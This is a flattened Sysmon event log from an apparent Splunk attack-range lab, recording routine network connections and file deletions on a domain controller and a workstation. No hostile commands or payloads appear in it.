AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61896-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.633{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61895-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 22542200x80000000000000001053010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.095{466BC892-F73A-60EB-C27D-00000000CF01}9972win-dc-890.attackrange.local0fe80::dd0d:23d0:6a34:6621;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 354300x80000000000000001053009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.570{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local53248- 354300x80000000000000001053008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.569{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local58965-false10.0.1.14win-dc-890.attackrange.local53domain 354300x80000000000000001053007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.569{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58965- 354300x80000000000000001053006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.569{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:98c0:7b90:86bb:ffff-58965-truea00:10e:0:0:0:0:0:0win-dc-890.attackrange.local53domain 354300x80000000000000001053005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.569{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61952- 354300x80000000000000001053004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.567{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61590- 354300x80000000000000001053003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.567{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61590-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domain 354300x80000000000000001053002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.567{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62064- 354300x80000000000000001053001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.557{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61894-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001053000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.557{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61894-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.555{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58308- 354300x80000000000000001052998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.553{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61893-false10.0.1.14win-dc-890.attackrange.local53domain 354300x80000000000000001052997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.553{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-890.attackrange.local61893-false10.0.1.14win-dc-890.attackrange.local53domain 354300x80000000000000001052996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.550{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local59217- 354300x80000000000000001052995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.550{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-890.attackrange.local59217-false10.0.1.14win-dc-890.attackrange.local53domain 23542300x80000000000000001052994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:08.090{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64F436ADDF44CFBC66E62803BB728C69,SHA256=A7D38AD873728A5DB42446A12D06A85E19D020C3E854A87ACC9D700E03698EFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A69829D4D654E1740F781E0E95F3E002,SHA256=A125B61CF869E96A455EB8A4D1AF0B98463806A3FA9D36BEB54170448E281893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:09.627{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC06234AB9F170B5FA3D5B23DAE2CEF,SHA256=231F29ECB5C0EDDCAE0EDF1A39D82BE5104A10B03CC9B25362F3D81B532C6BC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.683{00000000-0000-0000-0000-000000000000}9972<unknown process>-tcptruefalse10.0.1.14win-dc-890.attackrange.local61897-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.666{00000000-0000-0000-0000-000000000000}9972<unknown process>-tcptruefalse10.0.1.14win-dc-890.attackrange.local61896-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.633{00000000-0000-0000-0000-000000000000}9972<unknown process>-tcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61895-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001053014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:09.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542EE0853EF22E8B52D204149E306A3E,SHA256=58F5967EEC2CC4621302448EAB9B912C71345EF2E02154D0A38F8803FFE1D5A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:10.627{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419CB2C9DCFAF5174BC6567BD34A020A,SHA256=69382F7D50E74A9E29E51ABB935D735A9988478212766801BBD86697DDC0D5D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:10.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21EDE67C1DA7E96DF398FC6D47910FAE,SHA256=C3F201F4CCD2257BF0C63EF77C49BAAA302033834A97DF096C349AF008FB1B49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:11.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A611BCA35D7C82FD2E5FBA83F9034B,SHA256=B473847DA07DD9C67A09141A060CA9BBA120791D70DD6EF986ABF76A0A31FC4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.174{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AC8280A153DB32142BA3C9DFA2F4233B,SHA256=D3D3554B5AE329B241DCF9BB36DAB6CB023CD7355D7DFEA53E521059707E8400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=007F3DEBB91E60D67D412723FFC722CE,SHA256=7E66EB6C0ECC7C6401189F9FC3156014CA8114B30F9A8EA12F4F11C07A25E95A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BE20FD5E367E09227C5D966A55920DC7,SHA256=6947D47028AD54A95AA88658A3AEE9052EB6B513F7243418116D20E7A330AE70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=04A3F6BD7A05DE607D909D1E55A0B92B,SHA256=E2E21B69BA793CF79B3169EDE70B05F7FCCE18CAD5AA312357B6B8A34539E240,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=89545DCB155C387E5EB245D1ADC05E8C,SHA256=F2D5F2015F0AE36BC5C79A908DEBD447582E3DC4DBDA40C862CE866497A71695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F25B5958DD825B35F9F1E481EA98B5DC,SHA256=7043064C0D5C95D904E5EDD4E501CCAC7256E59261AB1F2EB57878CBECA74CCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E0A8B7EEB4C748FD5361FDDA994E336D,SHA256=E46114B6F273D64839BE8BF299D11848AAAA2940DC3F3641E5B154AE15F694CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=46D4B76470621EEF51AB03846F64B387,SHA256=FFB09F7B9FA861A82224337279361138FB86BE509D9B46383818EF0233EA3EE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D93173ABA9C918A794E23E106C05D925,SHA256=795DC158B7A95A31CD74DCEF9F13EEA185D6B08F6D5F9F545C003594CF498791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=761DA70A70264FDF579F4E515C81B4EF,SHA256=A0B0219E5D04928912FC34E3947232103862AD50902BBB250D52F46052833C53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.159{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1AD4AD4BF1D08B06BB17E4B55BF1D466,SHA256=45265D47618D85D566CC7C34887A7A9C01B4DBBA65D28A01BFA4815813A62D1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:11.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A857125CB724D4BD1065E14AB3D67443,SHA256=7997B2CCF790DAA28390EA31A09B1042A25D0E67E87EF85A02935C5DC733C0F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:12.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6258B70AE341EF877A213181EF21060,SHA256=75D3A89D1E46C676550E4C65520CF44168944AE507F1B3F5C1408E19E7FCD4BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:12.843{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=241C7E9688BC1D49A831DDA5658CC23D,SHA256=8F3A0624F5BE297156C22D42A87815F6DC632CD28A52A5DB6B6F7B0CD22D8B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:12.128{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59F4E79D22A81718CB13491B7315578D,SHA256=1C123312B3B557EFECF9184F04C8D64D686BB8F33D8F5C4A4FE24C96841C9536,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:03.879{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-890.attackrange.local138netbios-dgm 354300x80000000000000001053031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:03.879{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-890.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x8000000000000000809523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:13.658{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7C34658558C550FB38CCEE8E7C9867B,SHA256=1E5F37FF9F160A5752B7F2A007EFDD1395D8352B35F363C75BC648C9A344EB0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:13.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAABB7B644C888706F7E5B98C900221A,SHA256=138E71C5A6E5FA2A6DDEEF80D7647DFD3283FCF8518B1ED374B35398C5893043,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:11.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57404-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:14.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAB9E3F22941FC40885DE96C33EB6238,SHA256=97AFA1F723B97EA6295F762058AAD14D80394F644FDDB44ABB4485CAD9236BDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:05.760{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61898-false10.0.1.12-8000- 23542300x80000000000000001053036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:14.158{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7C3225D2B093FA0BF74D72457A7630B,SHA256=ABB9BBCB576E8A41FE24F9662BBE94860A001757316F77AE11BDB40C40285891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:15.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F982CC6925DFB5CCBB72799C1C8ACC2,SHA256=F101C620F8FAE2416F5E35655D66EA0A9A45F7A0318788627CB48D6741642BD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:15.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D01919AC68E1B0526B20873E366DD334,SHA256=5C391053AE50C9BC6085E51193D9637E206BE4D77B1B304A070BD1DD58BA3FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:15.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5FC1556FC8A07B9DEA80FA5A3A140F0,SHA256=C407F886689913E5CFB32FC462518617F3168B30BD900A14B7E00143655D499A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.209{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local54848- 23542300x80000000000000001053038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:15.159{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=825ED47587FA1AF45B8C132A1789F2FA,SHA256=922368F75624C120AB27416944065204DEEDF68635704AF757AEFF76F32E138F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:16.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95B83E1DD77BFF6825421F2CC4F69880,SHA256=011AF3A56B04C038271D02F98FEA66FDDE88B63CCD638C620E04A370F6DB70DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:08.022{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61899-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001053043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:08.022{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61899-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001053042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:16.173{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C34448F2733326A06AB59651B8C75354,SHA256=1802C97DF42545491504688C8ADD578CC4A4D0F74CB57BF6B3614881C6C5A07A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:17.678{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03797AD3C7F7458046E96538474C0D28,SHA256=4CE269D29EB8DD1DB6E5753CF30F2BDB26217E27BE8E5329CA1A44F1905BA786,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:17.192{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D20FF6BB1AE620FFE97F16DE01576014,SHA256=2DE3EF04B50A73E19D686EC10E2E65D618F95A269F66EFD3D46594194FE9A751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:18.693{0C1E0330-0518-60E8-D300-00000000D001}380NT 